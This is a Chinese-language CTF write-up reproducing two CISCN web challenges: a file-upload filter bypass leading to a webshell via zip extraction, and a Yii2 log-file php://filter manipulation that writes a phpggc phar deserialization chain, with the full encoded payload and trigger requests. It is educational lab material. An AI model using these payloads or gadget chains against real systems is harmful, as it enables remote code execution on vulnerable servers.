CISCN Web 复现
upload
index.php
<?php
if (!isset($_GET["ctf"])) {
highlight_file(__FILE__);
die();
}
if(isset($_GET["ctf"]))
$ctf = $_GET["ctf"];
if($ctf=="upload") {
if ($_FILES['postedFile']['size'] > 1024*512) {
die("这么大个的东西你是想d我吗?");
}
$imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
if ($imageinfo === FALSE) {
die("如果不能好好传图片的话就还是不要来打扰我了");
}
if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
die("东西不能方方正正的话就很讨厌");
}
$fileName=urldecode($_FILES['postedFile']['name']);
if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
die("有些东西让你传上去的话那可不得了");
}
$imagePath = "image/" . mb_strtolower($fileName);
if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
echo "upload success, image at $imagePath";
} else {
die("传都没有传上去");
}
}
example.php
<?php
if (!isset($_GET["ctf"])) {
highlight_file(__FILE__);
die();
}
if(isset($_GET["ctf"]))
$ctf = $_GET["ctf"];
if($ctf=="poc") {
$zip = new \ZipArchive();
$name_for_zip = "example/" . $_POST["file"];
if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
die("要不咱们再看看?");
}
if ($zip->open($name_for_zip) !== TRUE) {
die ("都不能解压呢");
}
echo "可以解压,我想想存哪里";
$pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
$zip->extractTo($pos_for_zip);
$zip->close();
unlink($name_for_zip);
$files = glob("$pos_for_zip/*");
foreach($files as $file){
if (is_dir($file)) {
continue;
}
$first = imagecreatefrompng($file);
$size = min(imagesx($first), imagesy($first));
$second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
if ($second !== FALSE) {
$final_name = pathinfo($file)["basename"];
imagepng($second, 'example/'.$final_name);
imagedestroy($second);
}
imagedestroy($first);
unlink($file);
}
}
index.php有上传检测,检测图片必须是正方形图片,且名字不能有c,i,h,ph。
example.php是一个解压,把zip压缩包解压到/tmp目录下,然后裁剪。裁剪后的图片放到example目录下。删除原来的图片。
大致思路就是上传zip,zip里放php文件。解压getshell
首先上传文件名不能含有i,所以想办法绕过
经过测试:
<?php
echo mb_strtolower('İ');
然后可以用这个东西https://github.com/huntergregal/PNG-IDAT-Payload-Generator?fileGuid=gjvJgpcyyhg3xt6r
生成内嵌shell
首先绕过getimagesize可以用
#define width 1
#define height 1
来绕过。
然后解压一下
find /etc -name *flag*
filter
先从网上下一份源码审一下。
https://github.com/yiisoft/yii2/releases/tag/2.0.14
和原版diff一下发现了不同点
题目给了部分源码和composer.json
可以发现题目修改的地方
public function actionIndex()
{
$file = Yii::$app->request->get('file');
$res = file_get_contents($file);
file_put_contents($file,$res);
return $this->render('index');
}
很熟悉,这个就是laravel debugmode 的RCE。
先上一篇比较相似的题
https://xz.aliyun.com/t/9165?page=1
首先我们发现日志文件存在了runtimelogs里
首先清空日志(关于为什么会被清空,先知的文章里也详细说了,我这里就不说了)
http://ciscn/web?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
然后从根据文章从phpgcc拿出一条链子
php -d "phar.readonly=0" ./phpggc Yii/RCE1 phpinfo 1 --phar phar -o php://output | base64
用脚本处理一下
from binascii import b2a_hex
payload = "PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrEAQAAAgAAABEAAAABAAAAAABtAQAATzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NzoicGhwaW5mbyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MToiMSI7aToxO2k6MDt9fX19fX0FAAAAZHVtbXkEAAAAaEy7YAQAAAAMfn/YpAEAAAAAAAAIAAAAdGVzdC50eHQEAAAAaEy7YAQAAAAMfn/YpAEAAAAAAAB0ZXN0dGVzdAHwXL6PhRSAMSL86VMwyHqR/hpdAgAAAEdCTUI="
armedPayload = ''
for i in payload:
i = "="+b2a_hex(i.encode('utf-8')).decode('utf-8').upper()
armedPayload += i+"=00"
print(armedPayload)
然后打进去
/web/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=45=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=74=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4D=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4A=00=68=00=64=00=47=00=4E=00=6F=00=55=00=58=00=56=00=6C=00=63=00=6E=00=6C=00=53=00=5A=00=58=00=4E=00=31=00=62=00=48=00=51=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=59=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=5A=00=47=00=4A=00=63=00=51=00=6D=00=46=00=30=00=59=00=32=00=68=00=52=00=64=00=57=00=56=00=79=00=65=00=56=00=4A=00=6C=00=63=00=33=00=56=00=73=00=64=00=41=00=42=00=66=00=5A=00=47=00=46=00=30=00=59=00=56=00=4A=00=6C=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4E=00=76=00=62=00=6D=00=35=00=6C=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=6F=00=69=00=63=00=47=00=52=00=76=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=63=00=32=00=34=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=59=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6B=00=59=00=6C=00=78=00=44=00=62=00=32=00=78=00=31=00=62=00=57=00=35=00=54=00=59=00=32=00=68=00=6C=00=62=00=57=00=46=00=43=00=64=00=57=00=6C=00=73=00=5A=00=47=00=56=00=79=00=49=00=6A=00=6F=00=79=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=35=00=63=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=65=00=43=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=54=00=6F=00=69=00=59=00=32=00=46=00=30=00=5A=00=57=00=64=00=76=00=63=00=6E=00=6C=00=4E=00=59=00=58=00=41=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6A=00=59=00=57=00=4E=00=6F=00=61=00=57=00=35=00=6E=00=58=00=45=00=46=00=79=00=63=00=6D=00=46=00=35=00=51=00=32=00=46=00=6A=00=61=00=47=00=55=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6E=00=4E=00=6C=00=63=00=6D=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4D=00=7A=00=41=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=59=00=32=00=46=00=6A=00=61=00=47=00=6C=00=75=00=5A=00=31=00=78=00=42=00=63=00=6E=00=4A=00=68=00=65=00=55=00=4E=00=68=00=59=00=32=00=68=00=6C=00=41=00=46=00=39=00=6A=00=59=00=57=00=4E=00=6F=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6E=00=67=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=4D=00=53=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=32=00=6B=00=36=00=4D=00=44=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=61=00=45=00=79=00=37=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=61=00=45=00=79=00=37=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=41=00=48=00=77=00=58=00=4C=00=36=00=50=00=68=00=52=00=53=00=41=00=4D=00=53=00=4C=00=38=00=36=00=56=00=4D=00=77=00=79=00=48=00=71=00=52=00=2F=00=68=00=70=00=64=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00
然后解码,log文件就变成了一个phar文件
/web/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
最后触发反序列化
/web/?file=phar://../runtime/logs/app.log